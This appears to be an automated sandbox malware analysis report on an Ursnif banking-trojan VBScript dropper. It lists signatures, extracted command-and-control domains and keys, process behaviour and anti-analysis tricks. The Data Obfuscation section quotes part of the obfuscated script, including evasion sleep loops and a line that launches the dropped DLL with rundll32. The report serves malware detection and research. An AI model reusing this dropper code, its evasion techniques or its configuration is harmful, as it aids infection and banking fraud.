Analysis Report Attachment_32954.vbs

Overview

General Information

Sample Name: Attachment_32954.vbs
Analysis ID: 384531
MD5: 39eb3427fd329de93a19190d84273710
SHA1: 5d9009503b3500c0b6d35e272dd9160e9d873e46
SHA256: adf9ca509037dc8ae4090fa9fa92c8eee621a9860a00da566b25643aa8689799
Tags: vbs
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Deletes itself after installation
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found potential string decryption / allocating functions
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Found malware configuration
Source: 20.2.rundll32.exe.48f94a0.3.raw.unpack Malware Configuration Extractor: Ursnif [{"RSA Public Key": "Xbs4Yk4n2aUcz4nAfmYBHRwWIvRHnuvNCkzGzFhWDffWAD6kAaz2nCrF+u1fBJy8EZGc5Sx4iFpGkK2Uml3/gsvcGmjbZA/KVSRirY7ISIz8qSDXCl7R7DH3QGwTH7G685n2r1rm1yDtD6HT1if24i3j6DsMpQyEccHcvxhbfoMgObXp5CGN5OHsQ+ytis2D"}, {"c2_domain": ["api10.laptok.at/api1", "golang.feel500.at/api1", "go.in100k.at/api1"], "botnet": "2200", "server": "730", "serpent_key": "hPdaZZCB2qcI31br", "sleep_time": "10", "SetWaitableTimer_value": "1"}]
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Rabin.dmg Virustotal: Detection: 50% Perma Link
Source: C:\Users\user\AppData\Local\Temp\Rabin.dmg Metadefender: Detection: 25% Perma Link
Source: C:\Users\user\AppData\Local\Temp\Rabin.dmg ReversingLabs: Detection: 72%
Multi AV Scanner detection for submitted file
Source: Attachment_32954.vbs Virustotal: Detection: 36% Perma Link
Source: Attachment_32954.vbs Metadefender: Detection: 16% Perma Link
Source: Attachment_32954.vbs ReversingLabs: Detection: 31%
Source: Binary string: c:\Poorplay\halfUs\BoardFamous\outexperience\us.pdb source: wscript.exe, 00000001.00000003.339767368.000001DAF14EF000.00000004.00000001.sdmp, rundll32.exe, 00000014.00000002.473616478.00000000702AD000.00000002.00020000.sdmp, Rabin.dmg.1.dr
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DC3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 20_2_00DC3512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702A088D FindFirstFileExW, 20_2_702A088D
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_7025161B GetProcAddress,NtCreateSection,memset, 20_2_7025161B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702515D9 NtMapViewOfSection, 20_2_702515D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702523C5 NtQueryVirtualMemory, 20_2_702523C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DC11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 20_2_00DC11A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DCB159 NtQueryVirtualMemory, 20_2_00DCB159
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702521A4 20_2_702521A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DC28E9 20_2_00DC28E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DCAF34 20_2_00DCAF34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702A466E 20_2_702A466E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70290FE0 20_2_70290FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702A7120 20_2_702A7120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_7029BA3F 20_2_7029BA3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702AA29E 20_2_702AA29E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702AA3BE 20_2_702AA3BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702A75B8 20_2_702A75B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_7029B7DA 20_2_7029B7DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702AB7DF 20_2_702AB7DF
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Rabin.dmg 94EB81BC58ADB976F21344D3EB273C9EB833AFBCADD121EB2AD38F1EF07A1F85
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 70294250 appears 39 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: Attachment_32954.vbs Initial sample: Strings found which are bigger than 50
Source: Rabin.dmg.1.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal92.troj.evad.winVBS@5/8@0/0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DC31DD CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 20_2_00DC31DD
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs'
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
Source: Attachment_32954.vbs Virustotal: Detection: 36%
Source: Attachment_32954.vbs Metadefender: Detection: 16%
Source: Attachment_32954.vbs ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs'
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Attachment_32954.vbs Static file information: File size 1444626 > 1048576
Source: Binary string: c:\Poorplay\halfUs\BoardFamous\outexperience\us.pdb source: wscript.exe, 00000001.00000003.339767368.000001DAF14EF000.00000004.00000001.sdmp, rundll32.exe, 00000014.00000002.473616478.00000000702AD000.00000002.00020000.sdmp, Rabin.dmg.1.dr

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Sleep 7000End With' pervasive glasswort corrector dinghy gander Oedipus mattress morrow Francis vibrato lawman Omaha pledge madstone grub ampersand heredity = 0REM age vex robe, maidservant midge presentation helm Klux racy Brahms judiciary, 1016749 barbarous recalcitrant grove = 1000Do While heredity < 100000000REM impetus Roth fudge souffle decorous Pravda inglorious calculate Paraguayan magnum repairmen Nassau If (heredity = 100000000) ThenWScript.Quit' KS decolletage Moiseyev nameable. Madeline Ellen script catastrophic hardwood Hankel tempest scriptural prime blab Hodges End IfIf (heredity = 5000000) Thengrove = grove + ((800 - 101.0) - ((66 + 3188.0) - 2655.0))End IfIf (heredity = 200) ThenExit DoEnd ifREM room Bohr. shard Germany nightmare standoff. 3540175 tetrahedron, 3863241 holler ailanthus spillover marriage stimulant lacrosse handicraftsman heredity = heredity + 1LoopREM shad eventide hour800 vicissitude Aeneas fledge reflectance bicep optimism enfant swirl, messieurs floorboard, Middletown Mira Ankara With WScript.Sleep 5000End WithEnd FunctionFunction hideout655()REM eyeball knack isomer chromatin Nassau692 Pangaea astonish. caliph, critic oedipal bravo If (InStr(WScript.ScriptName, "TESTING") > 0) ThenREM Iliad rennet manioc. visitor bootleg hart slaughterhouse, insurrect, 5691938 jejune clam exterior Rabin176 painstaking MsgBOX("RUN")Exit FunctionEnd Ifmoan("1")Set restaurant = CreateObject("WScript.Shell")restaurant.Run "rundll32" + " " + nepotism + "Rabin.dmg" + ",DllRegisterServer"prime623End FunctionFunction artful(dermatology, stagnant)Dim Byronic, deviateSet Byronic = CreateObject("Scripting.FileSystemObject")Set deviate = Byronic.CreateTextFile(dermatology, True)Dim pawpaw: pawpaw = (16 + (((78 + (-10.0)) - 36.0) + 252.0))Dim felsite506: felsite506 = (((54 + 4882.0) - (6837 - 1931.0)) + (-30.0))For Each soulful In stagnantREM Barr meteorite resonate cabdriver Lysenko sycophantic, 7200240 busywork tremendous facade xylophone locksmith inch RandomizeREM boggy255 tomography pander notebook. 7111724 contour strum period Reese Ouagadougou onrushing pathogenic fractionate = Int((pawpaw-felsite506+1)*Rnd+felsite506)If fractionate < (((90 + 1660.0) - (306 - 101.0)) - 1445.0) Thendeviate.WriteLine(soulful)ElseIf fractionate > (((73 - 20.0) + (31 + 3924.0)) - 3908.0) And fractionate < (((73 - 20.0) + (31 + 3924.0)) - 3908.0) Thendeviate.Write soulful + ":"Elsedeviate.Write soulfuldeviate.WriteBlankLines((((1304 - 545.0) - (27 + 8.0)) - 723.0))End IfNextdeviate.Close' baptism postdoctoral catalogue exclamatory layoff screenplay finny contact. linoleum Sagittarius downhill End FunctionFunction Gerhard()on error resume next' extensible Gibson spiderwort Datsun Barbara telemeter Costello Enoch. plume tribesmen jot sergeant mack Kirkland marriage649 Dim Aides: Set Aides = CreateObject("Scripting.FileSystemObject")' granular perspicacious Zanzibar indisposition oviform riverbank hasten. petunia kittenish tire gemsbok, 98142
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70252193 push ecx; ret 20_2_702521A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70252140 push ecx; ret 20_2_70252149
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DCABF0 push ecx; ret 20_2_00DCABF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DCAF23 push ecx; ret 20_2_00DCAF33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70264AB7 push ebx; ret 20_2_70264AB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70265B21 push edi; ret 20_2_70265B3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70266BBB push ebx; retf 20_2_70266BBD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702ABF08 push ecx; ret 20_2_702ABF06

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Rabin.dmg Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Rabin.dmg Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\attachment_32954.vbs Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 4120 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DC3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 20_2_00DC3512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702A088D FindFirstFileExW, 20_2_702A088D
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_7029FAB7 IsDebuggerPresent,OutputDebugStringW, 20_2_7029FAB7
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702A0417 mov eax, dword ptr fs:[00000030h] 20_2_702A0417
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702A045B mov eax, dword ptr fs:[00000030h] 20_2_702A045B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702A048C mov eax, dword ptr fs:[00000030h] 20_2_702A048C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70299DD7 mov eax, dword ptr fs:[00000030h] 20_2_70299DD7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702C204F mov eax, dword ptr fs:[00000030h] 20_2_702C204F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702C1C56 push dword ptr fs:[00000030h] 20_2_702C1C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702C2390 mov eax, dword ptr fs:[00000030h] 20_2_702C2390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_7029400F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_7029400F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70294667 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_70294667
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70299747 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_70299747

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: Rabin.dmg.1.dr Jump to dropped file
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer Jump to behavior
Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DCA12A cpuid 20_2_00DCA12A
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 20_2_7025111B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoEx,GetLocaleInfoW, 20_2_7029D950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 20_2_702A4BBD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesEx, 20_2_7029D7FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 20_2_702A5223
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 20_2_702A5349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 20_2_7029D3D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 20_2_702A544F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 20_2_702A551E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 20_2_702A4E5F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 20_2_702A4EAA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 20_2_702A4F45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 20_2_702A4FD0
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_7025116D GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 20_2_7025116D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DCA12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 20_2_00DCA12A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70251756 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 20_2_70251756
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 384531 Sample: Attachment_32954.vbs Startdate: 09/04/2021 Architecture: WINDOWS Score: 92 19 Found malware configuration 2->19 21 Multi AV Scanner detection for dropped file 2->21 23 Multi AV Scanner detection for submitted file 2->23 25 Yara detected  Ursnif 2->25 7 wscript.exe 2 10 2->7         started        process3 file4 15 C:\Users\user\AppData\Local\Temp\Rabin.dmg, PE32 7->15 dropped 17 C:\Users\user\AppData\Local\Temp\assai.zip, Zip 7->17 dropped 27 Benign windows process drops PE files 7->27 29 VBScript performs obfuscated calls to suspicious functions 7->29 31 Deletes itself after installation 7->31 11 rundll32.exe 7->11         started        signatures5 process6 process7 13 rundll32.exe 11->13         started       
No contacted IP infos